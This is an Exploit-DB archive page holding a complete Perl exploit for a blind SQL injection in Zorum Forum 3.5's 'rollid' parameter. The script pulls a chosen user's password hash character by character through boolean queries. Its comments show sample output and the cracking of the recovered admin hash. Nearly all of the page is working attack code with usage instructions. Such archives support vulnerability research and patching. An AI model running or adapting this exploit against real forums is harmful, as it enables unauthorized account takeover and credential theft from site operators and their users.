Zorum Forum 3.5 - 'rollid' SQL Injection

EDB-ID:

1509

CVE:

2005-4633 2005-4619

EDB Verified:

Author:

RusH

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2006-02-17

Vulnerable App: 
#!/usr/bin/perl

use LWP::UserAgent;

# -------------------------------------------------------------------------------------------
# Zorum forum (http://zorum.phpoutsourcing.com/) version 3.5 sql injection exploit
# by 1dt.w0lf // RusH security team
# *** work on all mysql versions
# -------------------------------------------------------------------------------------------
# Usage: r57zor.pl [path] [rollid] [username] 
# [path]     - path to forum
# [rollid]   - forum number where user create topic
# [username] - username for bruteforce
# -------------------------------------------------------------------------------------------
# screen:
# r57zor.pl http://zorum.phpoutsourcing.com/forum/ 4 admin
#  Please wait...
#  [################]
#
#  USER_NAME: admin
#  USER_PASS: 32b3956b2024e0fc
# -------------------------------------------------------------------------------------------  
# well it's just default sql crypting...
#  mysql_crk.exe 32b3956b2024e0fc
#  Hash: 32b3956b2024e0fc
#  Trying length 3
#  Trying length 4
#  Trying length 5
#  Trying length 6
#  Found pass: habzsi
# jabi-dabi-duuuu ... we are admins now... =)
# -------------------------------------------------------------------------------------------
# greets 2: GHC.ru , gst.void.ru
# -------------------------------------------------------------------------------------------
# 01.03.05


$path     = $ARGV[0];
$rollid   = $ARGV[1];
$username = $ARGV[2];

$s_num = 1;
$|++;

if (@ARGV < 2) { &usage; }
print " Please wait...\r\n";
print " [";

### quotes must die =)
($uusername = $username) =~ s/(.)/sprintf("%d,",ord($1))/eg;
$uusername =~ s/(.*),$/$1/;

while(1)
{
if(&found(47,58)==0) { &found(96,122); } 
$char = $i;
if ($char=="0") 
 { 
 print qq{] 
 
 USER_NAME: $username
 USER_PASS: $allchar
 };
 exit(); 
 }
else 
 { 
 print "#"; 
 $allchar .= chr($char); 
 }
$s_num++;
}

sub found($$)
 {
 my $fmin = $_[0];
 my $fmax = $_[1];
 if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; }
 
 $r = int($fmax - ($fmax-$fmin)/2);
 $check = " BETWEEN $r AND $fmax";
 if ( &check($check) ) { &found($r,$fmax); }
 else { &found($fmin,$r); }
 }
 
sub crack($$)
 {
 my $cmin = $_[0];
 my $cmax = $_[1];
 $i = $cmin;
 while ($i<$cmax)
  {
  $crcheck = "=$i";
  if ( &check($crcheck) ) { return $i; }
  $i++;
  }
 $i = 0;
 return $i;
 }
 
sub check($)
 {
 $n++;
 $ccheck = $_[0];
 $http_query = $path."index.php?method=showhtmllist&list=topic&rollid=".$rollid." AND u.name=char(".$uusername.") AND ascii(substring(u.password,".$s_num.",1))".$ccheck." /*";
 $mcb_reguest = LWP::UserAgent->new() or die;
 $res = $mcb_reguest->post($http_query); 
 @results = $res->content; 
 
 #print " HTTP QUERY : $http_query \r\n";
 
 foreach $result(@results)
  {
  if ($result =~ /details/) { return 1; }
  }
 return 0;
 }
 

sub usage()
 {
 print q( 
+-------------* Zorum sql injection exploit *--------------+
|                  r57 private stuff !!!                   |
|                   http://rst.void.ru                     |
|---* USAGE *----------------------------------------------|
| r57zor.pl [path] [rollid] [username]                     |
+--------------* view sources for more info *--------------+
 );
 exit();
 }

# milw0rm.com [2006-02-17]
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services